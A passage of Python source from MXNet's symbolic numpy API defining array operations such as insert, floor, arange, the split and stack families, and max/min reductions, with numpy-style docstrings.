inserted. Support for multiple insertions when `obj` is a single scalar or a sequence with one element (only support int32 and int64 element). values : _Symbol Values to insert into `arr`. If the type of values is different from that of arr, values is converted to the type of arr. axis : int, optional Axis along which to insert `values`. If `axis` is None then `arr` is flattened first. 
Returns ------- out : _Symbol A copy of `arr` with `values` inserted. Note that `insert` does not occur in-place: a new array is returned. If `axis` is None, `out` is a flattened array. Notes ----- - Note that for higher dimensional inserts `obj=0` behaves very different from `obj=[0]` just like `arr[:,0,:] = values` is different from `arr[:,[0],:] = values`. - If obj is a ndarray, it's dtype only supports int64 """ if isinstance(values, numeric_types): if isinstance(obj, slice): start = obj.start stop = obj.stop step = 1 if obj.step is None else obj.step return _npi.insert_slice(arr, val=values, start=start, stop=stop, step=step, axis=axis) elif isinstance(obj, integer_types): return _npi.insert_scalar(arr, val=values, int_ind=obj, axis=axis) elif isinstance(obj, Symbol): return _npi.insert_tensor(arr, obj, val=values, axis=axis) if not isinstance(arr, Symbol): # pylint: disable= undefined-variable raise TypeError("'arr' can not support type {}".format(str(type(arr)))) if not isinstance(values, Symbol): # pylint: disable= undefined-variable raise TypeError("'values' can not support type {}".format(str(type(values)))) if isinstance(obj, slice): start = obj.start stop = obj.stop step = 1 if obj.step is None else obj.step return _npi.insert_slice(arr, values, start=start, stop=stop, step=step, axis=axis) elif isinstance(obj, integer_types): return _npi.insert_scalar(arr, values, int_ind=obj, axis=axis) elif isinstance(obj, Symbol): return _npi.insert_tensor(arr, values, obj, axis=axis) else: raise TypeError("'obj' can not support type {}".format(str(type(obj)))) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def floor(x, out=None, **kwargs): r""" Return the floor of the input, element-wise. The floor of the ndarray `x` is the largest integer `i`, such that `i <= x`. It is often denoted as :math:`\lfloor x \rfloor`. Parameters ---------- x : _Symbol or scalar Input array. 
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    y : _Symbol or scalar
        The floor of each element in `x`, with `float` dtype.
        This is a scalar if `x` is a scalar.

    Examples
    --------
    >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
    >>> np.floor(a)
    array([-2., -2., -1.,  0.,  1.,  1.,  2.])
    >>> # if you use parameter out, x and out must be ndarray. if not, you will get an error!
    >>> a = np.array(1)
    >>> np.floor(np.array(3.5), a)
    array(3.)
    >>> a
    array(3.)
    """
    return _unary_func_helper(x, _npi.floor, _np.floor, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def trunc(x, out=None, **kwargs):
    r"""
    Return the truncated value of the input, element-wise.
    The truncated value of the scalar `x` is the nearest integer `i` which
    is closer to zero than `x` is. In short, the fractional part of the
    signed number `x` is discarded.

    Parameters
    ----------
    x : _Symbol or scalar
        Input data.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    y : _Symbol or scalar
        The truncated value of each element in `x`.
        This is a scalar if `x` is a scalar.

    Notes
    -----
    This function differs from the original numpy.trunc in the following aspects:
    - Do not support `where`, a parameter in numpy which indicates where to calculate.
    - Cannot cast type automatically. Dtype of `out` must be same as the expected one.
    - Cannot broadcast automatically. Shape of `out` must be same as the expected one.
    - If `x` is plain python numeric, the result won't be stored in out.
    """
    return _unary_func_helper(x, _npi.trunc, _np.trunc, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def logical_not(x, out=None, **kwargs):
    r"""
    Compute the truth value of NOT x element-wise.

    Parameters
    ----------
    x : _Symbol or scalar
        Logical NOT is applied to the elements of `x`.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    y : bool or _Symbol
        Boolean result with the same shape as `x` of the NOT operation
        on elements of `x`. This is a scalar if `x` is a scalar.

    Notes
    -----
    This function differs from the original numpy.logical_not in the following aspects:
    - Do not support `where`, a parameter in numpy which indicates where to calculate.
    - Cannot cast type automatically. Dtype of `out` must be same as the expected one.
    - Cannot broadcast automatically. Shape of `out` must be same as the expected one.
    - If `x` is plain python numeric, the result won't be stored in out.
    """
    return _unary_func_helper(x, _npi.logical_not, _np.logical_not, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def arcsinh(x, out=None, **kwargs):
    r"""
    Inverse hyperbolic sine, element-wise.

    Parameters
    ----------
    x : _Symbol or scalar
        Input array.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    arcsinh : _Symbol
        Array of the same shape as `x`.
        This is a scalar if `x` is a scalar.

    Notes
    -----
    `arcsinh` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that `sinh(z) = x`.
    For real-valued input data types, `arcsinh` always returns real output.
    For each value that cannot be expressed as a real number or infinity, it
    yields ``nan`` and sets the `invalid` floating point error flag.
    This function differs from the original numpy.arcsinh in the following aspects:
    - Do not support `where`, a parameter in numpy which indicates where to calculate.
    - Do not support complex-valued input.
    - Cannot cast type automatically. DType of `out` must be same as the expected one.
    - Cannot broadcast automatically. Shape of `out` must be same as the expected one.
    - If `x` is plain python numeric, the result won't be stored in out.
    """
    return _unary_func_helper(x, _npi.arcsinh, _np.arcsinh, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def arccosh(x, out=None, **kwargs):
    r"""
    Inverse hyperbolic cosine, element-wise.

    Parameters
    ----------
    x : _Symbol or scalar
        Input array.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    arccosh : _Symbol
        Array of the same shape as `x`.
        This is a scalar if `x` is a scalar.

    Notes
    -----
    `arccosh` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that `cosh(z) = x`.
    For real-valued input data types, `arccosh` always returns real output.
    For each value that cannot be expressed as a real number or infinity, it
    yields ``nan`` and sets the `invalid` floating point error flag.
    This function differs from the original numpy.arccosh in the following aspects:
    - Do not support `where`, a parameter in numpy which indicates where to calculate.
    - Do not support complex-valued input.
    - Cannot cast type automatically. Dtype of `out` must be same as the expected one.
    - Cannot broadcast automatically. Shape of `out` must be same as the expected one.
    - If `x` is plain python numeric, the result won't be stored in out.
    """
    return _unary_func_helper(x, _npi.arccosh, _np.arccosh, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def arctanh(x, out=None, **kwargs):
    r"""
    Inverse hyperbolic tangent, element-wise.

    Parameters
    ----------
    x : _Symbol or scalar
        Input array.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    arctanh : _Symbol
        Array of the same shape as `x`.
        This is a scalar if `x` is a scalar.

    Notes
    -----
    `arctanh` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that `tanh(z) = x`.
    For real-valued input data types, `arctanh` always returns real output.
    For each value that cannot be expressed as a real number or infinity, it
    yields ``nan`` and sets the `invalid` floating point error flag.
    This function differs from the original numpy.arctanh in the following aspects:
    - Do not support `where`, a parameter in numpy which indicates where to calculate.
    - Do not support complex-valued input.
    - Cannot cast type automatically. Dtype of `out` must be same as the expected one.
    - Cannot broadcast automatically. Shape of `out` must be same as the expected one.
    - If `x` is plain python numeric, the result won't be stored in out.
    """
    return _unary_func_helper(x, _npi.arctanh, _np.arctanh, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
def tile(A, reps):
    r"""
    Construct an array by repeating A the number of times given by reps.

    If `reps` has length ``d``, the result will have dimension of ``max(d, A.ndim)``.

    If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new axes.
    So a shape (3,) array is promoted to (1, 3) for 2-D replication, or
    shape (1, 1, 3) for 3-D replication. If this is not the desired behavior,
    promote `A` to d-dimensions manually before calling this function.

    If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
    Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
    (1, 1, 2, 2).

    Parameters
    ----------
    A : _Symbol or scalar
        An input array or a scalar to repeat.
    reps : a single integer or tuple of integers
        The number of repetitions of `x` along each axis.

    Returns
    -------
    c : _Symbol
        The tiled output array.
    """
    return _unary_func_helper(A, _npi.tile, _np.tile, reps=reps)


@set_module('mxnet.symbol.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
    """Return evenly spaced values within a given interval.

    Values are generated within the half-open interval ``[start, stop)``
    (in other words, the interval including `start` but excluding `stop`).
    For integer arguments the function is equivalent to the Python built-in
    `range` function, but returns an ndarray rather than a list.

    Parameters
    ----------
    start : number, optional
        Start of interval. The interval includes this value. The default
        start value is 0.
    stop : number
        End of interval. The interval does not include this value, except
        in some cases where `step` is not an integer and floating point
        round-off affects the length of `out`.
    step : number, optional
        Spacing between values. For any output `out`, this is the distance
        between two adjacent values, ``out[i+1] - out[i]``.  The default
        step size is 1.  If `step` is specified as a position argument,
        `start` must also be given.
    dtype : dtype
        The type of the output array.
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.

    Returns
    -------
    arange : _Symbol
        Array of evenly spaced values.
        For floating point arguments, the length of the result is
        ``ceil((stop - start)/step)``.  Because of floating point overflow,
        this rule may result in the last element of `out` being greater
        than `stop`.
    """
    if ctx is None:
        ctx = current_context()
    # Single-argument form: arange(stop) — shift the argument into `stop`.
    if stop is None:
        stop = start
        start = 0
    if step is None:
        step = 1
    # NOTE(review): this check runs after the start/stop swap above, so with
    # the single-argument form `start` has already been reset to 0 and the
    # branch can only trigger for an explicit `arange(None, None)`-style call.
    if start is None and stop is None:
        raise ValueError('start and stop cannot be both None')
    if step == 0:
        raise ZeroDivisionError('step cannot be 0')
    return _npi.arange(start=start, stop=stop, step=step, dtype=dtype, ctx=ctx)


@set_module('mxnet.symbol.numpy')
def delete(arr, obj, axis=None):
    """
    Return a new array with sub-arrays along an axis deleted. For a one
    dimensional array, this returns those entries not returned by
    `arr[obj]`.

    Parameters
    ----------
    arr : _Symbol
        Input array.
    obj : slice, scaler or _Symbol of ints
        Indicate indices of sub-arrays to remove along the specified axis.
    axis : scaler, optional
        The axis along which to delete the subarray defined by `obj`.
        If `axis` is None, `obj` is applied to the flattened array.
Returns ------- out : _Symbol A copy of `arr` with the elements specified by `obj` removed. Note that `delete` does not occur in-place. If `axis` is None, `out` is a flattened array. """ if not isinstance(arr, Symbol): raise TypeError("'arr' can not support type {}".format(str(type(arr)))) if isinstance(obj, slice): start = obj.start stop = obj.stop step = 1 if obj.step is None else obj.step return _npi.delete(arr, start=start, stop=stop, step=step, axis=axis) elif isinstance(obj, integer_types): return _npi.delete(arr, int_ind=obj, axis=axis) elif isinstance(obj, Symbol): return _npi.delete(arr, obj, axis=axis) else: raise TypeError("'obj' can not support type {}".format(str(type(obj)))) # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def split(ary, indices_or_sections, axis=0): """Split an array into multiple sub-arrays. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1-D python tuple, list or set. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along `axis`. If such a split is not possible, an error is raised. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along `axis` the array is split. For example, ``[2, 3]`` would, for ``axis=0``, result in - ary[:2] - ary[2:3] - ary[3:] If an index exceeds the dimension of the array along `axis`, an empty sub-array is returned correspondingly. axis : int, optional The axis along which to split, default is 0. Returns ------- sub-arrays : _Symbol A list of sub-arrays. 
Raises ------ ValueError If `indices_or_sections` is given as an integer, but a split does not result in equal division.""" indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple / list / set of ints') return _npi.split(ary, indices, axis, False, sections) # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def array_split(ary, indices_or_sections, axis=0): """Split an array into multiple sub-arrays. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along `axis`. If such a split is not possible, an array of length l that should be split into n sections, it returns l % n sub-arrays of size l//n + 1 and the rest of size l//n. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along `axis` the array is split. For example, ``[2, 3]`` would, for ``axis=0``, result in - ary[:2] - ary[2:3] - ary[3:] If an index exceeds the dimension of the array along `axis`, an empty sub-array is returned correspondingly. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1-D Python tuple, list or set. Param used to determine the number and size of the subarray. axis : int, optional The axis along which to split, default is 0. Returns ------- sub-arrays : list of ndarrays A list of sub-arrays. 
""" indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple / list / set of ints') ret = _npi.array_split(ary, indices, axis, False, sections) if not isinstance(ret, list): return [ret] return ret # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def hsplit(ary, indices_or_sections): """Split an array into multiple sub-arrays horizontally (column-wise). This is equivalent to ``split`` with ``axis=0`` if ``ary`` has one dimension, and otherwise that with ``axis=1``. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int, list of ints or tuple of ints. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along `axis`. If such a split is not possible, an error is raised. If `indices_or_sections` is a list of sorted integers, the entries indicate where along `axis` the array is split. If an index exceeds the dimension of the array along `axis`, it will raises errors. so index must less than or euqal to the dimension of the array along axis. Returns ------- sub-arrays : _Symbol A list of sub-arrays. Notes ------ - If `indices_or_sections` is given as an integer, but a split does not result in equal division.It will raises ValueErrors. - If indices_or_sections is an integer, and the number is 1, it will raises an error. Because single output from split is not supported yet... See Also -------- split : Split an array into multiple sub-arrays of equal size. 
Examples -------- >>> x = np.arange(16.0).reshape(4, 4) >>> x array([[ 0., 1., 2., 3.], [ 4., 5., 6., 7.], [ 8., 9., 10., 11.], [12., 13., 14., 15.]]) >>> np.hsplit(x, 2) [array([[ 0., 1.], [ 4., 5.], [ 8., 9.], [12., 13.]]), array([[ 2., 3.], [ 6., 7.], [10., 11.], [14., 15.]])] >>> np.hsplit(x, [3, 6]) [array([[ 0., 1., 2.], [ 4., 5., 6.], [ 8., 9., 10.], [12., 13., 14.]]), array([[ 3.], [ 7.], [11.], [15.]]), array([], shape=(4, 0), dtype=float32)] With a higher dimensional array the split is still along the second axis. >>> x = np.arange(8.0).reshape(2, 2, 2) >>> x array([[[ 0., 1.], [ 2., 3.]], [[ 4., 5.], [ 6., 7.]]]) >>> np.hsplit(x, 2) [array([[[ 0., 1.]], [[ 4., 5.]]]), array([[[ 2., 3.]], [[ 6., 7.]]])] If ``ary`` has one dimension, 'axis' = 0. >>> x = np.arange(4) array([0., 1., 2., 3.]) >>> np.hsplit(x, 2) [array([0., 1.]), array([2., 3.])] If you want to produce an empty sub-array, you can see an example. >>> np.hsplit(x, [2, 2]) [array([0., 1.]), array([], dtype=float32), array([2., 3.])] """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple of ints') return _npi.hsplit(ary, indices, 1, False, sections) # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def vsplit(ary, indices_or_sections): r""" vsplit(ary, indices_or_sections) Split an array into multiple sub-arrays vertically (row-wise). ``vsplit`` is equivalent to ``split`` with `axis=0` (default): the array is always split along the first axis regardless of the array dimension. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1 - D Python tuple, list or set. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along axis 0. 
If such a split is not possible, an error is raised. If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along axis 0 the array is split. For example, ``[2, 3]`` would result in - ary[:2] - ary[2:3] - ary[3:] If an index exceeds the dimension of the array along axis 0, an error will be thrown. Returns ------- sub-arrays : list of _Symbols A list of sub-arrays. See Also -------- split : Split an array into multiple sub-arrays of equal size. Notes ------- This function differs from the original `numpy.degrees <https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in the following aspects: - Currently parameter ``indices_or_sections`` does not support ndarray, but supports scalar, tuple and list - In ``indices_or_sections``, if an index exceeds the dimension of the array along axis 0, an error will be thrown. """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple of ints') return _npi.split(ary, indices, 0, False, sections) # pylint: enable=redefined-outer-name # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def dsplit(ary, indices_or_sections): """ Split array into multiple sub-arrays along the 3rd axis (depth). Please refer to the `split` documentation. `dsplit` is equivalent to `split` with ``axis=2``, the array is always split along the third axis provided the array dimension is greater than or equal to 3. Parameters ---------- ary : _Symbol Array to be divided into sub-arrays. indices_or_sections : int or 1-D Python tuple, list or set. If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays along axis 2. If such a split is not possible, an error is raised. 
If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where along axis 2 the array is split. For example, ``[2, 3]`` would result in - ary[:, :, :2] - ary[:, :, 2:3] - ary[:, :, 3:] If an index exceeds the dimension of the array along axis 2, an error will be thrown. """ indices = [] sections = 0 if isinstance(indices_or_sections, int): sections = indices_or_sections elif isinstance(indices_or_sections, (list, set, tuple)): indices = [0] + list(indices_or_sections) else: raise ValueError('indices_or_sections must either int or tuple of ints') return _npi.dsplit(ary, indices, 2, False, sections) # pylint: enable=redefined-outer-name @set_module('mxnet.symbol.numpy') def concatenate(seq, axis=0, out=None): """Join a sequence of arrays along an existing axis. Parameters ---------- a1, a2, ... : sequence of _Symbols The arrays must have the same shape, except in the dimension corresponding to `axis` (the first, by default). axis : int, optional The axis along which the arrays will be joined. If axis is None, arrays are flattened before use. Default is 0. out : ndarray, optional If provided, the destination to place the result. The shape must be correct, matching that of what concatenate would have returned if no out argument were specified. Returns ------- res : _Symbol The concatenated array. Examples -------- >>> a = np.array([[1, 2], [3, 4]]) >>> b = np.array([[5, 6]]) >>> np.concatenate((a, b), axis=0) array([[1., 2.], [3., 4.], [5., 6.]]) >>> np.concatenate((a, b), axis=None) array([1., 2., 3., 4., 5., 6.]) >>> np.concatenate((a, b.T), axis=1) array([[1., 2., 5.], [3., 4., 6.]]) """ return _npi.concatenate(*seq, axis=axis, out=out) @set_module('mxnet.symbol.numpy') def append(arr, values, axis=None): # pylint: disable=redefined-outer-name """ Append values to the end of an array. Parameters ---------- arr : _Symbol Values are appended to a copy of this array. values : _Symbol These values are appended to a copy of `arr`. 
It must be of the correct shape (the same shape as `arr`, excluding `axis`). If `axis` is not specified, `values` can be any shape and will be flattened before use. axis : int, optional The axis along which `values` are appended. If `axis` is not given, both `arr` and `values` are flattened before use. Returns ------- append : _Symbol A copy of `arr` with `values` appended to `axis`. Note that `append` does not occur in-place: a new array is allocated and filled. If `axis` is None, `out` is a flattened array. Examples -------- >>> np.append(np.array([1, 2, 3]), np.array([[4, 5, 6],[7, 8, 9]])) array([1., 2., 3., 4., 5., 6., 7., 8., 9.]) When `axis` is specified, `values` must have the correct shape. >>> np.append(np.array([[1, 2, 3], [4, 5, 6]]), np.array([[7, 8, 9]]), axis=0) array([[1., 2., 3.], [4., 5., 6.], [7., 8., 9.]]) """ return _npi.concatenate(arr, values, axis=axis, out=None) @set_module('mxnet.symbol.numpy') def stack(arrays, axis=0, out=None): """Join a sequence of arrays along a new axis. The axis parameter specifies the index of the new axis in the dimensions of the result. For example, if `axis=0` it will be the first dimension and if `axis=-1` it will be the last dimension. Parameters ---------- arrays : sequence of _Symbols Each array must have the same shape. axis : int, optional The axis in the result array along which the input arrays are stacked. out : _Symbol, optional If provided, the destination to place the result. The shape must be correct, matching that of what stack would have returned if no out argument were specified. 
Returns ------- stacked : _Symbol The stacked array has one more dimension than the input arrays.""" def get_list(arrays): if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'): raise ValueError("expected iterable for arrays but got {}".format(type(arrays))) return [arr for arr in arrays] arrays = get_list(arrays) return _npi.stack(*arrays, axis=axis, out=out) @set_module('mxnet.symbol.numpy') def vstack(arrays, out=None): r"""Stack arrays in sequence vertically (row wise). This is equivalent to concatenation along the first axis after 1-D arrays of shape `(N,)` have been reshaped to `(1,N)`. Rebuilds arrays divided by `vsplit`. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions `concatenate` and `stack` provide more general stacking and concatenation operations. Parameters ---------- tup : sequence of _Symbol The arrays must have the same shape along all but the first axis. 1-D arrays must have the same length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays, will be at least 2-D. """ def get_list(arrays): if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'): raise ValueError("expected iterable for arrays but got {}".format(type(arrays))) return [arr for arr in arrays] arrays = get_list(arrays) return _npi.vstack(*arrays) @set_module('mxnet.symbol.numpy') def row_stack(arrays): r"""Stack arrays in sequence vertically (row wise). This is equivalent to concatenation along the first axis after 1-D arrays of shape `(N,)` have been reshaped to `(1,N)`. Rebuilds arrays divided by `vsplit`. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions `concatenate` and `stack` provide more general stacking and concatenation operations. 
Parameters ---------- tup : sequence of _Symbol The arrays must have the same shape along all but the first axis. 1-D arrays must have the same length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays, will be at least 2-D. """ def get_list(arrays): if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'): raise ValueError("expected iterable for arrays but got {}".format(type(arrays))) return [arr for arr in arrays] arrays = get_list(arrays) return _npi.vstack(*arrays) @set_module('mxnet.symbol.numpy') def column_stack(tup): """ Stack 1-D arrays as columns into a 2-D array. Take a sequence of 1-D arrays and stack them as columns to make a single 2-D array. 2-D arrays are stacked as-is, just like with `hstack`. 1-D arrays are turned into 2-D columns first. Parameters ---------- tup : sequence of 1-D or 2-D arrays. Arrays to stack. All of them must have the same first dimension. Returns ------- stacked : 2-D array The array formed by stacking the given arrays. See Also -------- stack, hstack, vstack, concatenate Examples -------- >>> a = np.array((1,2,3)) >>> b = np.array((2,3,4)) >>> np.column_stack((a,b)) array([[1., 2.], [2., 3.], [3., 4.]]) """ return _npi.column_stack(*tup) @set_module('mxnet.symbol.numpy') def hstack(arrays): """ Stack arrays in sequence horizontally (column wise). This is equivalent to concatenation along the second axis, except for 1-D arrays where it concatenates along the first axis. Rebuilds arrays divided by hsplit. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions concatenate, stack and block provide more general stacking and concatenation operations. Parameters ---------- tup : _Symbol The arrays must have the same shape along all but the second axis, except 1-D arrays which can be any length. 
Returns ------- stacked : _Symbol The array formed by stacking the given arrays. Examples -------- >>> from mxnet import np,npx >>> a = np.array((1,2,3)) >>> b = np.array((2,3,4)) >>> np.hstack((a,b)) array([1., 2., 3., 2., 3., 4.]) >>> a = np.array([[1],[2],[3]]) >>> b = np.array([[2],[3],[4]]) >>> np.hstack((a,b)) array([[1., 2.], [2., 3.], [3., 4.]]) """ return _npi.hstack(*arrays) @set_module('mxnet.symbol.numpy') def dstack(arrays): """ Stack arrays in sequence depth wise (along third axis). This is equivalent to concatenation along the third axis after 2-D arrays of shape `(M,N)` have been reshaped to `(M,N,1)` and 1-D arrays of shape `(N,)` have been reshaped to `(1,N,1)`. Rebuilds arrays divided by `dsplit`. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions `concatenate`, `stack` and `block` provide more general stacking and concatenation operations. Parameters ---------- tup : sequence of _Symbol The arrays must have the same shape along all but the first axis. 1-D arrays must have the same length. Returns ------- stacked : _Symbol The array formed by stacking the given arrays, will be at least 2-D. 
    """
    return _npi.dstack(*arrays)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def maximum(x1, x2, out=None, **kwargs):
    """Return the element-wise maximum of `x1` and `x2`.

    Symbolic counterpart of `numpy.maximum`; scalar operands are handled
    by the dedicated scalar operator inside the helper.
    """
    return _ufunc_helper(x1, x2, _npi.maximum, _np.maximum, _npi.maximum_scalar, None, out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def fmax(x1, x2, out=None, **kwargs):
    """Return the element-wise maximum of `x1` and `x2`.

    Symbolic counterpart of `numpy.fmax`; scalar operands are handled
    by the dedicated scalar operator inside the helper.
    """
    return _ufunc_helper(x1, x2, _npi.fmax, _np.fmax, _npi.fmax_scalar, None, out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def minimum(x1, x2, out=None, **kwargs):
    """Return the element-wise minimum of `x1` and `x2`.

    Symbolic counterpart of `numpy.minimum`; scalar operands are handled
    by the dedicated scalar operator inside the helper.
    """
    return _ufunc_helper(x1, x2, _npi.minimum, _np.minimum, _npi.minimum_scalar, None, out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def fmin(x1, x2, out=None, **kwargs):
    """Return the element-wise minimum of `x1` and `x2`.

    Symbolic counterpart of `numpy.fmin`; scalar operands are handled
    by the dedicated scalar operator inside the helper.
    """
    return _ufunc_helper(x1, x2, _npi.fmin, _np.fmin, _npi.fmin_scalar, None, out)


@set_module('mxnet.symbol.numpy')
def max(a, axis=None, out=None, keepdims=False):
    """
    Return the maximum of an array or maximum along an axis.

    Parameters
    ----------
    a : _Symbol
        Input data.
    axis : int, optional
        Axis along which to operate.  By default, flattened input is used.
    out : ndarray, optional
        Alternative output array in which to place the result.  Must
        be of the same shape and buffer length as the expected output.
        See `doc.ufuncs` (Section "Output arguments") for more details.
    keepdims : bool, optional
        If this is set to True, the axes which are reduced are left
        in the result as dimensions with size one. With this option,
        the result will broadcast correctly against the original `arr`.

    Returns
    -------
    max : _Symbol
        Maximum of `a`. If `axis` is None, the result is an array of dimension 1.
        If `axis` is given, the result is an array of dimension
        ``a.ndim - 1``.

    See Also
    --------
    min :
        The minimum value of an array along a given axis, ignoring any nan.
    maximum :
        Element-wise maximum of two arrays, ignoring any nan.
    argmax :
        Return the indices of the maximum values.

    Notes
    -----
    NaN in the original `numpy` is denoted as nan and will be ignored.
Don't use `max` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``maximum(a[0], a[1])`` is faster than ``max(a, axis=0)``. """ return _npi.max(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def min(a, axis=None, out=None, keepdims=False): """ Return the minimum of an array or minimum along an axis. Parameters ---------- a : ndarray Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- min : ndarray Minimum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- max : The maximum value of an array along a given axis, ignoring any nan. minimum : Element-wise minimum of two arrays, ignoring any nan. Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `min` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``minimum(a[0], a[1])`` is faster than ``min(a, axis=0)``. """ return _npi.min(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def amax(a, axis=None, out=None, keepdims=False): """ Return the maximum of an array or maximum along an axis. Parameters ---------- a : ndarray Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. 
See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- max : ndarray Maximum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- min : The minimum value of an array along a given axis, ignoring any nan. maximum : Element-wise maximum of two arrays, ignoring any nan. argmax : Return the indices of the maximum values. Notes ----- NaN in the orginal `numpy` is denoted as nan and will be ignored. Don't use `max` for element-wise comparison of 2 arrays; when ``a.shape[0]`` is 2, ``maximum(a[0], a[1])`` is faster than ``max(a, axis=0)``. """ return _npi.amax(a, axis=axis, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def amin(a, axis=None, out=None, keepdims=False): """ Return the minimum of an array or minimum along an axis. Parameters ---------- a : ndarray Input data. axis : int, optional Axis along which to operate. By default, flattened input is used. out : ndarray, optional Alternative output array in which to place the result. Must be of the same shape and buffer length as the expected output. See `doc.ufuncs` (Section "Output arguments") for more details. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original `arr`. Returns ------- min : ndarray Minimum of `a`. If `axis` is None, the result is an array of dimension 1. If `axis` is given, the result is an array of dimension ``a.ndim - 1``. See Also -------- max : The maximum value of an array along a given axis, ignoring any nan. minimum : Element-wise minimum of two arrays, ignoring any nan. 
